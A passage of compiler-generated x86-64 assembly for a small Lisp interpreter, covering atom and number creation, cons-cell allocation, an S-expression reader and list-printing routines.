leaq L_.str.12(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _wrd_out_of_data@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edx leaq L_.str.13(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _wrd_success@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edx leaq L_.str.14(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _wrd_failure@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edi leaq L_.str.2(%rip), %rsi movl $3, %edx callq _mk_atom movq %rax, %rcx movq _wrd_define@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edi leaq L_.str.15(%rip), %rsi movl $4, %edx callq _mk_atom movq %rax, %rcx movq _wrd_let@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edi leaq L_.str.16(%rip), %rsi movl $3, %edx callq _mk_atom movq %rax, %rcx movq _wrd_lambda@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edi leaq L_.str.17(%rip), %rsi movl $2, %edx callq _mk_atom movq %rax, %rcx movq _wrd_cadr@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edi leaq L_.str.18(%rip), %rsi movl $2, %edx callq _mk_atom movq %rax, %rcx movq _wrd_caddr@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edi leaq L_.str.19(%rip), %rsi movl $2, %edx callq _mk_atom movq %rax, %rcx movq _wrd_quote@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edi leaq L_.str.20(%rip), %rsi movl $4, %edx callq _mk_atom movq %rax, %rcx movq _wrd_if@GOTPCREL(%rip), %rax movq %rcx, (%rax) movl $1, %edi leaq L_.str.21(%rip), %rsi movl $2, %edx callq _mk_atom movq %rax, %rcx movq _wrd_car@GOTPCREL(%rip), %rax movq %rcx, (%rax) movl $2, %edx leaq L_.str.22(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _wrd_cdr@GOTPCREL(%rip), %rax movq %rcx, (%rax) movl $3, %edx leaq L_.str.23(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, -8(%rbp) movl $4, %edi leaq L_.str.24(%rip), %rsi movl $2, %edx callq _mk_atom movq %rax, -8(%rbp) movl $5, %edi leaq L_.str.25(%rip), %rsi movl $3, %edx callq _mk_atom movq %rax, -8(%rbp) movl $6, %edi leaq L_.str.26(%rip), %rsi movl $2, %edx callq _mk_atom movq %rax, -8(%rbp) movl $7, %edi leaq L_.str.27(%rip), %rsi movl $2, %edx callq _mk_atom movq %rax, -8(%rbp) movl $8, %edi leaq L_.str.28(%rip), %rsi movl $3, %edx callq _mk_atom movq %rax, -8(%rbp) movl $9, %edi leaq L_.str.29(%rip), %rsi movl $2, %edx callq _mk_atom movq %rax, -8(%rbp) movl $10, %edi leaq L_.str.30(%rip), %rsi movl $3, %edx callq _mk_atom movq %rax, -8(%rbp) movl $11, %edi leaq L_.str.31(%rip), %rsi movl $3, %edx callq _mk_atom movq %rax, -8(%rbp) movl $12, %edi leaq L_.str.32(%rip), %rsi movl $3, %edx callq _mk_atom movq %rax, -8(%rbp) movl $13, %edi leaq L_.str.33(%rip), %rsi movl $3, %edx callq _mk_atom movq %rax, -8(%rbp) movl $14, %edi leaq L_.str.34(%rip), %rsi movl $3, %edx callq _mk_atom movq %rax, -8(%rbp) movl $15, %edi leaq L_.str.35(%rip), %rsi movl $3, %edx callq _mk_atom movq %rax, -8(%rbp) movl $16, %edi leaq L_.str.36(%rip), %rsi movl $3, %edx callq _mk_atom movq %rax, -8(%rbp) movl $17, %edi leaq L_.str.37(%rip), %rsi movl $3, %edx callq _mk_atom movq %rax, -8(%rbp) movl $18, %edi leaq L_.str.38(%rip), %rsi movl $2, %edx callq _mk_atom movq %rax, -8(%rbp) movl $19, %edi leaq L_.str.39(%rip), %rsi movl $2, %edx callq _mk_atom movq %rax, -8(%rbp) movl $20, %edi leaq L_.str.40(%rip), %rsi movl $2, %edx callq _mk_atom movq %rax, -8(%rbp) movl $21, %edi leaq L_.str.41(%rip), %rsi movl $1, %edx callq _mk_atom movq %rax, -8(%rbp) movl $22, %edi leaq L_.str.42(%rip), %rsi movl $2, %edx callq _mk_atom movq %rax, -8(%rbp) movl $23, %edi leaq L_.str.43(%rip), %rsi movl $1, %edx callq _mk_atom movq %rax, -8(%rbp) xorl %eax, %eax movl %eax, %edi leaq L_.str.44(%rip), %rsi movl $2, %edx callq _mk_atom movq %rax, %rcx movq _wrd_eval@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edi leaq L_.str.45(%rip), %rsi movl $4, %edx callq _mk_atom movq %rax, %rcx movq _wrd_try@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edx leaq L_.str.46(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _left_bracket@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edx leaq L_.str.47(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _right_bracket@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edx leaq L_.str.48(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _left_paren@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edx leaq L_.str.49(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _right_paren@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edx leaq L_.str.50(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, %rcx movq _double_quote@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %edi callq _mk_numb movq %rax, %rcx movq _wrd_zero@GOTPCREL(%rip), %rax movq %rcx, (%rax) movl $49, %edi xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, %rdi callq _mk_numb movq %rax, %rcx movq _wrd_one@GOTPCREL(%rip), %rax movq %rcx, (%rax) addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _in ## -- Begin function in .p2align 4, 0x90 _in: ## @in .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $192, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) callq _in_word movq %rax, -32(%rbp) movq -32(%rbp), %rax movq _right_paren@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB2_4 ## %bb.1: cmpq $0, -24(%rbp) je LBB2_3 ## %bb.2: movq -32(%rbp), %rax movq %rax, -8(%rbp) jmp LBB2_27 LBB2_3: movq $0, -8(%rbp) jmp LBB2_27 LBB2_4: movq -32(%rbp), %rax movq _left_paren@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB2_9 ## %bb.5: xorl %eax, %eax movl %eax, %esi movq %rsi, %rdi callq _cons movq %rax, -48(%rbp) movq %rax, -40(%rbp) LBB2_6: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rdi movl $1, %esi callq _in movq %rax, -56(%rbp) movq _right_paren@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax je LBB2_8 ## %bb.7: ## in Loop: Header=BB2_6 Depth=1 movq -56(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -48(%rbp), %rdx movq _cdr@GOTPCREL(%rip), %rcx movq %rax, (%rcx,%rdx,8) movq %rax, -48(%rbp) jmp LBB2_6 LBB2_8: movq -40(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) jmp LBB2_27 LBB2_9: cmpq $0, -16(%rbp) jne LBB2_11 ## %bb.10: movq -32(%rbp), %rax movq %rax, -8(%rbp) jmp LBB2_27 LBB2_11: movq -32(%rbp), %rax movq _double_quote@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB2_13 ## %bb.12: xorl %eax, %eax movl %eax, %esi movq %rsi, %rdi callq _in movq %rax, -8(%rbp) jmp LBB2_27 LBB2_13: movq -32(%rbp), %rax movq _wrd_cadr@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB2_15 ## %bb.14: movq _wrd_car@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -104(%rbp) ## 8-byte Spill movq _wrd_cdr@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -112(%rbp) ## 8-byte Spill movl $1, %edi xorl %eax, %eax movl %eax, %esi callq _in movq %rax, %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -112(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -104(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, -8(%rbp) jmp LBB2_27 LBB2_15: movq -32(%rbp), %rax movq _wrd_caddr@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB2_17 ## %bb.16: movq _wrd_car@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -120(%rbp) ## 8-byte Spill movq _wrd_cdr@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -128(%rbp) ## 8-byte Spill movq _wrd_cdr@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -136(%rbp) ## 8-byte Spill movl $1, %edi xorl %eax, %eax movl %eax, %esi callq _in movq %rax, %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -136(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -128(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -120(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, -8(%rbp) jmp LBB2_27 LBB2_17: movq -32(%rbp), %rax movq _wrd_let@GOTPCREL(%rip), %rcx cmpq (%rcx), %rax jne LBB2_21 ## %bb.18: movl $1, %edi xorl %eax, %eax movl %eax, %esi callq _in movq %rax, -64(%rbp) movl $1, %edi xorl %eax, %eax movl %eax, %esi callq _in movq %rax, -72(%rbp) movl $1, %edi xorl %eax, %eax movl %eax, %esi callq _in movq %rax, -80(%rbp) movq -64(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) jne LBB2_20 ## %bb.19: movq -64(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -88(%rbp) movq -64(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -64(%rbp) movq _wrd_quote@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -144(%rbp) ## 8-byte Spill movq _wrd_lambda@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -152(%rbp) ## 8-byte Spill movq -88(%rbp), %rax movq %rax, -160(%rbp) ## 8-byte Spill movq -72(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -160(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq -152(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -144(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, -72(%rbp) LBB2_20: movq _wrd_quote@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -176(%rbp) ## 8-byte Spill movq _wrd_lambda@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -184(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, -192(%rbp) ## 8-byte Spill movq -80(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -192(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq -184(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -176(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, -168(%rbp) ## 8-byte Spill movq -72(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -168(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, -8(%rbp) jmp LBB2_27 LBB2_21: movq -32(%rbp), %rcx movq _pf_args@GOTPCREL(%rip), %rax movswq (%rax,%rcx,2), %rax movq %rax, -96(%rbp) cmpq $0, -96(%rbp) jne LBB2_23 ## %bb.22: movq -32(%rbp), %rax movq %rax, -8(%rbp) jmp LBB2_27 LBB2_23: movq -32(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, -48(%rbp) movq %rax, -40(%rbp) LBB2_24: ## =>This Inner Loop Header: Depth=1 movq -96(%rbp), %rax addq $-1, %rax movq %rax, -96(%rbp) cmpq $0, %rax jle LBB2_26 ## %bb.25: ## in Loop: Header=BB2_24 Depth=1 movl $1, %edi xorl %eax, %eax movl %eax, %esi callq _in movq %rax, %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq -48(%rbp), %rdx movq _cdr@GOTPCREL(%rip), %rcx movq %rax, (%rcx,%rdx,8) movq %rax, -48(%rbp) jmp LBB2_24 LBB2_26: movq -40(%rbp), %rax movq %rax, -8(%rbp) LBB2_27: movq -8(%rbp), %rax addq $192, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _cons ## -- Begin function cons .p2align 4, 0x90 _cons: ## @cons .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) cmpq $0, -24(%rbp) je LBB3_3 ## %bb.1: movq -24(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax cmpl $0, %eax je LBB3_3 ## %bb.2: movq -16(%rbp), %rax movq %rax, -8(%rbp) jmp LBB3_6 LBB3_3: cmpq $1000000, _next(%rip) ## imm = 0xF4240 jl LBB3_5 ## %bb.4: leaq L_.str.51(%rip), %rdi xorl %eax, %eax movl %eax, -36(%rbp) ## 4-byte Spill callq _printf movl -36(%rbp), %edi ## 4-byte Reload callq _exit LBB3_5: movq _next(%rip), %rax movq %rax, %rcx addq $1, %rcx movq %rcx, _next(%rip) movq %rax, -32(%rbp) movq -16(%rbp), %rdx movq -32(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -24(%rbp), %rdx movq -32(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -32(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax movw $0, (%rax,%rcx,2) movq -32(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax movw $0, (%rax,%rcx,2) movq -32(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax movq $0, (%rax,%rcx,8) movq -32(%rbp), %rcx movq _pf_numb@GOTPCREL(%rip), %rax movw $0, (%rax,%rcx,2) movq -32(%rbp), %rcx movq _pf_args@GOTPCREL(%rip), %rax movw $0, (%rax,%rcx,2) movq -32(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq $0, (%rax,%rcx,8) movq -32(%rbp), %rax movq %rax, -8(%rbp) LBB3_6: movq -8(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _out ## -- Begin function out .p2align 4, 0x90 _out: ## @out .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -8(%rbp), %rsi leaq L_.str.52(%rip), %rdi movb $0, %al callq _printf movq $0, _col(%rip) movq -16(%rbp), %rdi callq _out_lst leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movq -16(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _ev ## -- Begin function ev .p2align 4, 0x90 _ev: ## @ev .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) xorl %eax, %eax movl %eax, %esi movq %rsi, %rdi callq _cons movq %rax, %rcx movq _turing_machine_tapes@GOTPCREL(%rip), %rax movq %rcx, (%rax) movl $1, %edi xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, %rcx movq _display_enabled@GOTPCREL(%rip), %rax movq %rcx, (%rax) xorl %eax, %eax movl %eax, %esi movq %rsi, %rdi callq _cons movq %rax, %rcx movq _captured_displays@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq -8(%rbp), %rdi movq _wrd_no_time_limit@GOTPCREL(%rip), %rax movq (%rax), %rsi callq _eval movq %rax, -16(%rbp) cmpq $0, -16(%rbp) jge LBB5_2 ## %bb.1: xorl %eax, %eax ## kill: def $rax killed $eax subq -16(%rbp), %rax movq %rax, -24(%rbp) ## 8-byte Spill jmp LBB5_3 LBB5_2: movq -16(%rbp), %rax movq %rax, -24(%rbp) ## 8-byte Spill LBB5_3: movq -24(%rbp), %rax ## 8-byte Reload addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _mk_atom ## -- Begin function mk_atom .p2align 4, 0x90 _mk_atom: ## @mk_atom .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) xorl %eax, %eax movl %eax, %esi movq %rsi, %rdi callq _cons movq %rax, -32(%rbp) movq -32(%rbp), %rdx movq -32(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -32(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -32(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax movw $1, (%rax,%rcx,2) movq -32(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax movw $0, (%rax,%rcx,2) movq -16(%rbp), %rdi callq _mk_string movq %rax, %rdx movq -32(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -8(%rbp), %rax movw %ax, %dx movq -32(%rbp), %rcx movq _pf_numb@GOTPCREL(%rip), %rax movw %dx, (%rax,%rcx,2) movq -24(%rbp), %rax movw %ax, %dx movq -32(%rbp), %rcx movq _pf_args@GOTPCREL(%rip), %rax movw %dx, (%rax,%rcx,2) movq -32(%rbp), %rdi xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, %rdx movq -32(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -32(%rbp), %rdi movq _obj_lst@GOTPCREL(%rip), %rax movq (%rax), %rsi callq _cons movq %rax, %rcx movq _obj_lst@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq -32(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _mk_numb ## -- Begin function mk_numb .p2align 4, 0x90 _mk_numb: ## @mk_numb .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) xorl %eax, %eax movl %eax, %esi movq %rsi, %rdi callq _cons movq %rax, -16(%rbp) movq -16(%rbp), %rdx movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -16(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax movw $1, (%rax,%rcx,2) movq -16(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax movw $1, (%rax,%rcx,2) movq -8(%rbp), %rdx movq -16(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -16(%rbp), %rcx movq _pf_numb@GOTPCREL(%rip), %rax movw $0, (%rax,%rcx,2) movq -16(%rbp), %rcx movq _pf_args@GOTPCREL(%rip), %rax movw $0, (%rax,%rcx,2) movq -16(%rbp), %rcx movq _vlst@GOTPCREL(%rip), %rax movq $0, (%rax,%rcx,8) movq -16(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _mk_string ## -- Begin function mk_string .p2align 4, 0x90 _mk_string: ## @mk_string .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq $0, -16(%rbp) LBB8_1: ## =>This Inner Loop Header: Depth=1 movq -8(%rbp), %rax movsbl (%rax), %eax cmpl $0, %eax je LBB8_3 ## %bb.2: ## in Loop: Header=BB8_1 Depth=1 movq -8(%rbp), %rax movq %rax, %rcx addq $1, %rcx movq %rcx, -8(%rbp) movsbq (%rax), %rdi movq -16(%rbp), %rsi callq _cons movq %rax, -16(%rbp) jmp LBB8_1 LBB8_3: movq -16(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _out_lst ## -- Begin function out_lst .p2align 4, 0x90 _out_lst: ## @out_lst .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax cmpl $0, %eax je LBB9_3 ## %bb.1: movq -8(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax cmpq $0, (%rax,%rcx,8) jne LBB9_3 ## %bb.2: movl $48, %edi callq _out_chr jmp LBB9_11 LBB9_3: movq -8(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB9_5 ## %bb.4: movq -8(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _out_atm jmp LBB9_11 LBB9_5: movl $40, %edi callq _out_chr LBB9_6: ## =>This Inner Loop Header: Depth=1 movq -8(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) setne %al xorb $-1, %al testb $1, %al jne LBB9_7 jmp LBB9_10 LBB9_7: ## in Loop: Header=BB9_6 Depth=1 movq -8(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _out_lst movq -8(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) movq -8(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) jne LBB9_9 ## %bb.8: ## in Loop: Header=BB9_6 Depth=1 movl $32, %edi callq _out_chr LBB9_9: ## in Loop: Header=BB9_6 Depth=1 jmp LBB9_6 LBB9_10: movl $41, %edi callq _out_chr LBB9_11: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _out_chr ## -- Begin function out_chr .p2align 4, 0x90 _out_chr: ## @out_chr .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq _col(%rip), %rax movq %rax, %rcx addq $1, %rcx movq %rcx, _col(%rip) cmpq $50, %rax jne LBB10_2 ## %bb.1: leaq L_.str.53(%rip), %rdi leaq L_.str.54(%rip), %rsi movb $0, %al callq _printf movq $1, _col(%rip) LBB10_2: movq -8(%rbp), %rax movl %eax, %edi callq _putchar addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _out_atm ## -- Begin function out_atm .p2align 4, 0x90 _out_atm: ## @out_atm .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) cmpq $0, -8(%rbp) jne LBB11_2 ## %bb.1: jmp LBB11_3 LBB11_2: movq -8(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _out_atm movq -8(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _out_chr LBB11_3: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _eq_wrd ## -- Begin function eq_wrd .p2align 4, 0x90 _eq_wrd: ## @eq_wrd .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) cmpq $0, -16(%rbp) jne LBB12_2 ## %bb.1: cmpq $0, -24(%rbp) sete %al andb $1, %al movzbl %al, %eax cltq movq %rax, -8(%rbp) jmp LBB12_7 LBB12_2: cmpq $0, -24(%rbp) jne LBB12_4 ## %bb.3: movq $0, -8(%rbp) jmp LBB12_7 LBB12_4: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq -24(%rbp), %rdx movq _car@GOTPCREL(%rip), %rcx cmpq (%rcx,%rdx,8), %rax je LBB12_6 ## %bb.5: movq $0, -8(%rbp) jmp LBB12_7 LBB12_6: movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -24(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rsi callq _eq_wrd movq %rax, -8(%rbp) LBB12_7: movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _lookup_word ## -- Begin function lookup_word .p2align 4, 0x90 _lookup_word: ## @lookup_word .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) movq _obj_lst@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -24(%rbp) LBB13_1: ## =>This Inner Loop Header: Depth=1 movq -24(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) setne %al xorb $-1, %al testb $1, %al jne LBB13_2 jmp LBB13_5 LBB13_2: ## in Loop: Header=BB13_1 Depth=1 movq -24(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rcx movq _pname@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -16(%rbp), %rsi callq _eq_wrd cmpq $0, %rax je LBB13_4 ## %bb.3: movq -24(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) jmp LBB13_6 LBB13_4: ## in Loop: Header=BB13_1 Depth=1 movq -24(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -24(%rbp) jmp LBB13_1 LBB13_5: xorl %eax, %eax movl %eax, %edx leaq L_.str.55(%rip), %rsi movq %rdx, %rdi callq _mk_atom movq %rax, -24(%rbp) movq -16(%rbp), %rdx movq -24(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -24(%rbp), %rax movq %rax, -8(%rbp) LBB13_6: movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _in_word2 ## -- Begin function in_word2 .p2align 4, 0x90 _in_word2: ## @in_word2 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp LBB14_1: ## =>This Loop Header: Depth=1 ## Child Loop BB14_3 Depth 2 ## Child Loop BB14_8 Depth 2 cmpq $0, _in_word2.buffer(%rip) jne LBB14_29 ## %bb.2: ## in Loop: Header=BB14_1 Depth=1 xorl %eax, %eax movl %eax, %esi movq %rsi, %rdi callq _cons movq %rax, -32(%rbp) movq %rax, -24(%rbp) LBB14_3: ## Parent Loop BB14_1 Depth=1 ## => This Inner Loop Header: Depth=2 callq _getchar cltq movq %rax, -8(%rbp) cmpq $-1, -8(%rbp) jne LBB14_5 ## %bb.4: xorl %eax, %eax movl %eax, -44(%rbp) ## 4-byte Spill movl %eax, %edi callq _time movq %rax, %rcx movq _time2@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq (%rax), %rdi movq _time1@GOTPCREL(%rip), %rax movq (%rax), %rsi callq _difftime leaq L_.str.56(%rip), %rdi movb $1, %al callq _printf movl -44(%rbp), %edi ## 4-byte Reload callq _exit LBB14_5: ## 